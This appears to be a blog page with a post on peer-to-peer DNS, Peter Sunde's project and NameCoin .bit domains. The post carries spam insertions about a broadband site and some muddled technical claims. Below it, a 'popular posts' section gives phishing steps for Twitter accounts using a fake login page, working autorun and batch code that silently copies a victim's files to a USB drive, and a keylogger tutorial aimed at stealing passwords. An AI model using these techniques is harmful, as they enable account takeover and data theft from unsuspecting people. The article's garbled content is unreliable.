Skip to main content

P2P DNS helps in Taking ownership of the internet

Our Internet runs on DNS, which is one of the most useful technological developments, and Broadband Expert has more info on cable providers in our area. DNS is quite unfamiliar and invisible to many users before they take the first step to register a domain name of their own. The idea of domain registrar comes up suddenly at this point.

However, the most critical aspect is that it is the body that has the control of all top tier domains. And it is also responsible for solving the major domain name disagreements and several other domain associated issues. The governing body is called ICANN; many technology experts are of the opinion that the internet is owned by it one way or the other. This makes sense and one should not wonder why it is being said.

The power of ICANN on domain ownership is unparalleled. It is this power that has revolutionary aspect associated to it as well. Only because of this governing body, the internet has revolutionized and changed the way the world connected previously. Some time back, the government of the United States carried out a chain of domain seizures. In response to this action, Peter Sunde, cofounder of The Pirate Bay, started working over a project that would facilitate a well-distributed DNS service going through a P2P network.
This announcement by Sunde was very well received by the majority of internet users at the time. As a result, there was immense activity in this regard when the plan was in its initial phase. Users can still view a lot of brainstorming that was initiated by internet aficionados when they offered their expertise services to refurbish the nitty-gritty of DNS.

The project was considered to be a very ambitious one, but had to beat various technical obstacles as well. Unfortunately, Sunde’s plan disappeared within a few months time. To be able to see his last attempts to build this project; check out the GitHub Repository under the name of Caleb DeLisle, but he has renamed the plan to CJDNS.

The question is: what happened to the project that garnered a lot of attention initially, but could not sustain for long and instead vanished? Earlier in the year, surprisingly, there was a new contender to the plan named NameCoin. The name originates from its original BitCoin base. A greater part of the code used with NameCoin project is sourced from original BitCoin base. It was hacked to get the final outcomes that the owners are still trying to seek. It is because NameCoin runs directly as a currency, which also owns a P2P DNS structure incorporated into it.
In reality, it is a NameCoin deal when someone buys .bit domain. The major difference when compared to the conventional DNS is that the domain cannot be taken away once is it registered in a user’s name. This happens because the system administrator would have to compromise the entire platform of P2P. With this, even if your domain expires, it will remain in your name. However, as a registered user, you will only have to renew your ownership every year.

Many technological experts encouraged this idea; however, it comes with its own set of problems, which cannot be ignored. The major one of all problems is that in order to have .bit domain in your name, you will have to purchase it. At present, the only means to buy these domains is using NameCoin or BitCoin, which is its sister project.

Moreover, it is not an easy task to get hold of this form of currency as it seems, though BitCoin recently saw the worst crash, which could mean that it was time to set footsteps in this market. Even today you have to run a certain variant of software of BitCoin to be able to purchase and register the domain. The registrar accepts only BitCoin as the trade currency when you make purchases. With such effects, it seems that .bit domains will be only available to the owners of BitCoin only.

Currently, BitCoin is not naming IP mappings. Contrarily, it is more difficult and growing constantly. A good example is that the DNS is clearly responsible for facilitating information related to email exchange so they can work properly and Broadband Expert has more info on cable providers in my area.

Comments

Popular posts from this blog

How to Hack a Twitter Account

Twitter is one of the topmost widely running social networking sites,Its alexa ranking is 14(As per now).So therefore it is largely becoming target of hackers,Many requests keep coming to me ,please tell us a way to Hack twitter accounts or How to hack twitter accounts,so therefore i today i have written a post on How to hack twitter accounts Well for this purpose i will tell you the most used method to hack twitter accounts i.e phishing How to hack twitter accounts - Phishing First of all download:   Twitter fake login page ( Latest Version ) Click Here To Download : NOTE : You will be asked to enter a password while extracting the Documents. Please Insert the password as : IHA Step 1 First extract the contents into a folder Step 2 Then edit login.php .(right click and then select edit) In that ,find (CTRL+F) ‘http://rafayhackingarticles.blogspot.com’ then change it to your destined URL but don’t forget ‘'. Now rename the script to pass.php and save it

How to steal data using your USB flash drive

Hello friends, In this tutorial we will revealed a new tweak which is illegal but sharing here for educational purpose. This post is only to demonstrate how a user can steal victim's data without any permission, as soon as the flash drive is attached to computer, the files starts to copy in flash drive without any notice. Process is very simple as we have to add only 4-5 notepad files in the flash drive. Follow the following steps :- 1. Create a notepad file with name autorun.inf nad copy the following code. [autorun] icon=drive.ico open=launch.bat action=Click OK to Run shell\open\command=launch.bat 2. Create another notepad file of name file.bat and copy the following code. @echo off :: variables /min SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo off %backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics” %backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites” %backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”

How to use Keyloggers – Detailed Tutorial and FAQs

Here is a DETAILED tutorial which contains every possible information that you need to know about keyloggers which includes how to use it, how it works etc. WARNING: I highly recommend that you read this post completely since every single piece of information is important. I know most of you are new to the concept of keyloggers. For some of you, this might be the first time you heard about the term “keylogger”. So to give you a clear picture and make you understand better I would like to take up this post in the form of FAQs (Frequently Asked Questions). Here we go… 1. What is a Keylogger? A keylogger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password. 2. How Keylogger works? Once the keylogger is installed on a PC, it starts operating in the backgrou